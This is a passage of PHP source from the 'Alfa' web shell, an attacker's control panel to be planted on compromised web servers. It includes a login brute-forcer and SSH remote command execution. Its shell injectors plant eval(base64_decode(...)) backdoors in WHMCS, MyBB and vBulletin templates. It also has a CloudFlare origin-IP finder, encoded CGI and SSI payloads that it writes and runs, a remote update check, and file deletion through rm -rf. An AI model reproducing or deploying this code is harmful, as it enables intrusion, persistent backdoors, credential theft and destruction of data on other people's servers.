'; $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']); $port = $_POST['alfa2']; $usernames= $_POST['alfa3']; $passwords = $_POST['alfa4']; $fcrack = $_POST['alfa5']; $cracking = $_POST['alfa6']; $protocol = $_POST['alfa7']; $loginpanel = $_POST['alfa8']; $p = $loginpanel == 'phpmyadmin' ? $p = true : false; if($cracking=='start'){ echo __pre(); $exuser = explode("\n",$usernames); $expw = explode("\n",$passwords); foreach($exuser as $user){ foreach($expw as $pw){ $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p); Alfa_Call_Function_Cracker($loginpanel,$array); } } echo '
Attack Finished...'; } echo '
'; alfafooter(); } function alfassh2(){ if(function_exists('ssh2_connect')){ $_SESSION['connected']= false; $ssh_ip = $_POST['alfa1']; $ssh_login = $_POST['alfa2']; $ssh_pass = $_POST['alfa3']; $ssh_port = $_POST['alfa4']; $ssh_command = $_POST['alfa5']; if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port)) { if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) { $_SESSION['connected']= true; } } if($_SESSION['connected']!== true){ alfahead(); echo "
"; echo "
IPSSH USERSSH PASSSSH PORT
"; alfafooter(); } if($_SESSION['connected']==true){ alfahead(); echo "
"; echo "
"; $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command); stream_set_blocking($alfastream,true); $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO); if($_POST['alfa6']=='>>'){ echo '
';
ob_start();
echo  stream_get_contents($output);
echo htmlspecialchars(ob_get_clean());
}
echo "
"; alfafooter(); }}else{ alfahead(); echo '

Server does not support SSH2

'; alfafooter(); } } function output($string){ echo "

Click Here !


";} function alfaShellInjectors(){ alfahead(); echo '
'; AlfaNum(11); echo '

| Cms Shell Injector |

| WHMCS | | MyBB | | vBulletin |

'; $selector = '

Shell Inject Method :

'; if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){ AlfaNum(); echo __pre()."

| WHMCS |

".getConfigHtml('whmcs')."

"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo $selector; echo "

"; if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6']; $dbn = $_POST['alfa7']; $dbp = $_POST['alfa8']; $dbh = $_POST['alfa9']; $path = $_POST['alfa10']; $method = $_POST['alfa4']; $index = "{php}".ALFA_UPLOADER.";{/php}"; $newin = str_replace("'","\'",$index); $newindex = "

Dear $newin,

Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.

To reset your password, please visit the url below:
{\$pw_reset_url}

When you visit the link above, your password will be reset, and the new password will be emailed to you.

{\$signature}

{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}"; if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){ if(filter_var($path,FILTER_VALIDATE_URL)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn)); $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet['message']; $tempSave = str_replace("'","\'",$tempSave1); $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'"; $result = mysqli_query($conn,$inject) or die (mysqli_error($conn)); $create = "insert into tblclients (email) values('solevisible@fbi.gov')"; $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn)); if(function_exists('curl_version') && $method == 'auto'){ $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path."/pwreset.php"); $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token); $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn)); __alert("shell injectet..."); $ff= 'http://'.$path."/solevisible.php"; output($ff);}else{ echo "

Please go to Target => ".$path."/pwreset.php
And Reset Password With Email => solevisible@fbi.gov
And Go To => ".$path."/solevisible.php


";}}else{__alert('Path is not Valid...');}}} }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){ AlfaNum(1,2,3,5); echo __pre()."

| MyBB |

".getConfigHtml("mybb")."
"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50') ); create_table($table); echo $selector; echo "

"; if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6']; $dbn = $_POST['alfa7']; $dbp = $_POST['alfa8']; $dbh = $_POST['alfa9']; $prefix = $_POST['alfa10']; $method = $_POST['alfa4']; $shellCode = "{\${".ALFA_UPLOADER."}}"; $newinshell = str_replace("'","\'",$shellCode); if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn)); $inject = "select template from {$prefix}templates where title= 'calendar'"; $result = mysqli_query($conn, $inject) or die (mysqli_error($conn)); $GetTemp = mysqli_fetch_assoc($result); $saveDate = $GetTemp['template']; $repsave = str_replace($shellCode,"",$saveDate); $repsave = str_replace("'","\'",$repsave); $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'"; $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn)); $geturl = "select value from {$prefix}settings where name= 'bburl'"; $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn)); $rowb = mysqli_fetch_assoc($findurl); $furl = $rowb['value']; $realurl = parse_url($furl,PHP_URL_HOST); $realpath = parse_url($furl,PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){ if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){ @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n"); @fputs($fsock, "HOST: $realurl\r\n"); @fputs($fsock, "Connection: close\r\n\r\n"); $check = fgets($fsock); if(preg_match("/200 OK/i",$check)){ $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'"; $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;} @fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){ $AlfaCurl->Send($realurl.$realpath."/calendar.php"); $res = true; } if($res){ $ff = 'http://'.$realurl.$realpath."/solevisible.php"; output($ff); }else{ $ff = 'http://'.$realurl.$realpath."/calendar.php"; $fff = 'http://'.$realurl.$realpath."/solevisible.php"; echo "

Please Go To Target => ".$ff."
And Go To => ".$fff."


"; }}}} if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){ AlfaNum(1,2,7,9,10); echo __pre().'

| vbulletin |

'.getConfigHtml('vb').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50') ); create_table($table); echo $selector; echo '

'; if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){ $method = $_POST['alfa8']; $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&"; $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn)); $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'"; $recivedata = @mysqli_query($conn,$rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd['template']; $code = str_replace("'","\'",$code); $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'"; $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn)); $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'"); $getval = @mysqli_fetch_assoc($geturl); $saveval = $getval['value']; $realurl = parse_url($saveval,PHP_URL_HOST); $realpath = parse_url($saveval,PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){ if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){ @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n"); @fputs($fsock, "HOST: $realurl\r\n"); @fputs($fsock, "Connection: close\r\n\r\n"); $check = fgets($fsock); if(preg_match("/200 OK/i",$check)){ $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'"; $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } }elseif(function_exists('curl_version') && $method == 'auto'){ $AlfaCurl->Send($realurl.$realpath."/faq.php"); $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'"; $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn)); $res = true; } if($res){ $ff = 'http://'.$realurl.$realpath."/solevisible.php"; output($ff); }else{ $ff = 'http://'.$realurl.$realpath."/faq.php"; $fff = 'http://'.$realurl.$realpath."/solevisible.php"; echo "

First Open This Link => ".$ff."
Second Open This Link => ".$fff."

";}}} echo ''; alfafooter(); } function alfaupdatepath(){ if($_POST['path']!=''){ $_SESSION[__LAST_CWD__] = $_POST['path']; } echo($_SESSION[__LAST_CWD__]); } function alfacheckfiletype(){ $path = $_POST['path']; $arg = $_POST['arg']; if(@is_file($path.'/'.$arg)){ echo("file"); }else{ echo("dir"); } } function alfacheckupdate(){ if(!isset($_COOKIE['alfa_checkupdate'])){ if(function_exists("curl_version")){ $update = new AlfaCURL(); $json = $update->Send("http://solevisible.com/update.json"); $json = @json_decode($json); if($json){ if(__ALFA_VERSION__ != $json->version){ @setcookie("alfa_checkupdate", "1", time()+86400); echo(''); } } } } } function alfaWriteTocgiapi($name, $source){ @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); @mkdir('alfacgiapi',0755); __write_file("alfacgiapi/".$name, __get_resource($source)); @chmod("alfacgiapi/".$name, 0755); } function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");} function alfaupdateheader(){ if(!isset($_SESSION["updateheader_data"])){ $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw=="; $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"])); alfaWriteTocgiapi("getheader.alfa",$bash); $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true); if(@is_array(@json_decode($data,true))){ $_SESSION["updateheader_data"] = $data; echo $data; } }else{ echo $_SESSION["updateheader_data"]; } } function alfassiShell(){ alfahead(); echo '
'; @mkdir('alfa_shtml',0755); @chdir('alfa_shtml'); alfacgihtaccess('shtml'); $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw=='; @__write_file('alfa_ssi.shtml',__get_resource($code)); @chmod("alfa_ssi.shtml",0755); echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml'); echo '
'; alfafooter(); } function alfacloudflare(){ alfahead(); AlfaNum(8,9,10,7,6,5,4,3); echo "

| Cloud Flare ByPasser |

>'); return false;\" method='post'>

Target:

"; if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){ $url = $_POST['alfa1']; if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){ $url = preg_replace('/^(https?):\/\//', '', $url); $url = "http://www.".$url; } $headers = @get_headers($url, 1); $server = $headers['Server']; $subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.'); if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){ if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{ $url = explode($matches[0], $url); $url = $url[1];}} if(is_array($server))$server = $server[0]; echo __pre(); if(preg_match('/cloudflare/i', $server)) echo "\n[+] CloudFlare detected: {$server}\n
"; else echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n"; echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n

"; echo "[+] Searching for more IP addresses.\n\n

"; for($x=0;$x"; } echo "\n[+] Finished.\n
"; } echo '
'; alfafooter(); } function is_ipv4($ip){ return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)'; } function __alert($s){ echo '
'.__pre().$s.'
'; } function create_table($data){ echo ''; foreach ($data as $key => $val){ $array = array(); foreach($val as $k => $v){ $array[$k] = $v; } echo ""; } echo '
".$array['tdName']."
'; } function alfaphp2xml(){ alfahead(); AlfaNum(8,9,10,7,6,5,4,3); echo "

| Shell For vBulletin |

>'); return false;\" method='post'>




"; if($_POST['alfa2']&&$_POST['alfa2']=='>>'){ echo __pre()."

'; } echo '
'; alfafooter(); } function alfacpcrack(){ alfahead(); echo '

| Hash Tools |

| DeCrypter | | Hash Analyzer |

'; if($_POST['alfa1']=='dec'){ $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM'); echo '
| DeCrypter |


Decrypt Method:

'; if($_POST['alfa3'] == '>>'){ $hash = $_POST['alfa2']; if(!empty($hash)){ $hash_type = $_POST['alfa4']; $email = "solevisible@gmail.com"; $code = "7b9fa79f92c3cd96"; $target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code; $resp = @file_get_contents($target); if($resp==''){ $get = new AlfaCURL(); $resp = $get->Send($target); } echo __pre().'
'; switch($resp){ case('CODE ERREUR : 001'):echo "You exceeded the 400 allowed request per day";break; case('CODE ERREUR : 003'):echo "Your request includes more than 400 hashes.";break; case('CODE ERREUR : 004'):echo "The type of hash you provide in the argument hash_type doesn't seem to be valid";break; case('CODE ERREUR : 005'):echo "The hash you provide doesn't seem to match with the type of hash you set.";break; } if(substr($resp,0,4)!='CODE'&&$resp!=''){ echo "Result: ".$resp.""; }elseif(substr($resp,0,4)!='CODE'){ echo "NoT Found
"; } echo('
'); } } } if($_POST['alfa1']=='analyzer'){ echo '

| Hash Analyzer |

Hash:

'; if($_POST['alfa3'] == '>>'){ $hash = $_POST['alfa2']; if(!empty($hash)){ $curl = new AlfaCURL(); $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search"); echo(__pre().'
'); if(preg_match('#
(.*?)
#',$resp,$s)){ echo(''.$s[1].''); }else{ echo('Not Found...!'); } echo('

'); } } } echo '
'; alfafooter(); } function alfafooter(){ if(!isset($_POST['ajax'])){ echo "
Make File :
Make Dir :
Delete :
Chmod :
Change Dir :
Read File :
Execute :
Upload file:


[ ./AlfaTeam © 2012-".date('Y')." ]
Clear all
History
Show Editor
Show Cgi
"; }} if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function alfaWhich($p) { $path = alfaEx('which ' . $p,false,false); if(!empty($path)) return strlen($path); return false; } function alfaSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function alfaPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function alfaPermsColor($f,$isbash=false){ $class = ""; $num = ""; $human = ""; if($isbash){ $class = $f["class"]; $num = $f["num"]; $human = $f["human"]; }else{ $num = substr(sprintf('%o', @fileperms($f)),-4); $human = alfaPerms(@fileperms($f)); if(!@is_readable($f)) $class = "main_red_perm"; elseif (!@is_writable($f)) $class = "main_white_perm"; else $class = "main_green_perm"; } return ''.$num.' >> '.$human.''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function reArrayFiles($file_post){ $file_ary = array(); $file_count = count($file_post['name']); $file_keys = array_keys($file_post); for ($i=0; $i<$file_count; $i++) { foreach ($file_keys as $key) { $file_ary[$i][$key] = $file_post[$key][$i]; } } return $file_ary; } function _alfa_can_runCommand($cgi=true,$cache=true){ if(isset($_SESSION["alfa_canruncmd"])&&$cache){ return true; } if(strlen(alfaEx("whoami",false,$cgi))>0){ $_SESSION["alfa_canruncmd"] = true; return true; } return false; } function _alfa_symlink($target, $link){ $phpsym = function_exists("symlink"); if($phpsym){ @symlink($target, $link); }else{ alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'"); } } function _alfa_file_exists($file,$cgi=true){ if(@file_exists($file)){ return true; }else{ if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){ return true; } } return false; } function _alfa_file($file,$cgi=true){ $array = @file($file); if(!$array){ if(strlen(alfaEx("id",false,$cgi))>0){ $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi); if(strlen($data)>0){ return explode("\n", $data); }else{ return false; } }else{ return false; } }else{ return $array; } } function _alfa_is_writable($file){ $check = false; $check = @is_writable($file); if(!$check){ if(_alfa_can_runCommand()){ $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"'); if($check == "yes"){ $check = true; }else{ $check = false; } } } return $check; } function _alfa_is_dir($dir,$mode="-d"){ $check = false; $check = @is_dir($dir); if(!$check){ if(_alfa_can_runCommand()){ $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"'); if($check == "yes"){ return true; }else{ return false; } } } return $check; } function alfaFilesMan(){ alfahead(); AlfaNum(8,9,10,7,6,5,4); echo '
'; if(!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['alfa1'])){ switch($_POST['alfa1']){ case 'uploadFile': if(isset($GLOBALS['glob_chdir_false'])){ $alfa_canruncmd = _alfa_can_runCommand(true,true); $move_cmd_file = true; } $files = reArrayFiles($_FILES['f']); foreach($files as $file){ if($move_cmd_file){ alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'"); }else{ @move_uploaded_file($file['tmp_name'],$file['name']); } echo "uped...!
"; } break; case 'mkdir': $new_dir_cmd = false; if(isset($GLOBALS['glob_chdir_false'])){ if(_alfa_can_runCommand(true,true)){ alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'"); } }else{ if(!@mkdir(trim($_POST['alfa2']))) echo "Can't create new dir !"; } break; case 'delete': function deleteDir($path){ $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = @opendir($path); while(($item = @readdir($dh)) !== false){ $item = $path.$item; if((basename($item) == "..") || (basename($item) == ".")) continue; $type = @filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } @closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f){ if($f == '..') continue; $f = rawurldecode($f); if(isset($GLOBALS["glob_chdir_false"])){ if(_alfa_can_runCommand(true,true)){ alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'"); } }else{ alfaEx("rm -rf '".addslashes($f)."'",false,false); if(@is_dir($f)) deleteDir($f); else @unlink($f); } } if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){ deleteDir(rawurldecode(@$_POST['alfa2'])); alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false); }else{ @unlink(rawurldecode(@$_POST['alfa2'])); } if(isset($GLOBALS["glob_chdir_false"])){ $source = rawurldecode(@$_POST['alfa2']); if($source!='..'&&!empty($source)){ if(_alfa_can_runCommand(true,true)){ alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'"); } } } break; case 'paste': if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){ function copy_paste($c,$s,$d){ if(@is_dir($c.$s)){ @mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); }elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){ function move_paste($c,$s,$d){ if(@is_dir($c.$s)){ @mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if(($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); }elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION['f'] as $f) @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); }elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){ if(class_exists('ZipArchive')){ $zip = new ZipArchive(); $zipX = "alfa_".rand(1,1000).".zip"; if($zip->open($zipX, 1)){ @chdir($_SESSION['c']); foreach($_SESSION['f'] as $f){ if($f == '..')continue; if(@is_file($_SESSION['c'].$f)) $zip->addFile($_SESSION['c'].$f, $f); elseif(@is_dir($_SESSION['c'].$f)){ $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); foreach($iterator as $key=>$value){ $key = str_replace('\\','/',realpath($key)); if(@is_dir($key)){ if(in_array(substr($key, strrpos($key,'/')+1),array('.', 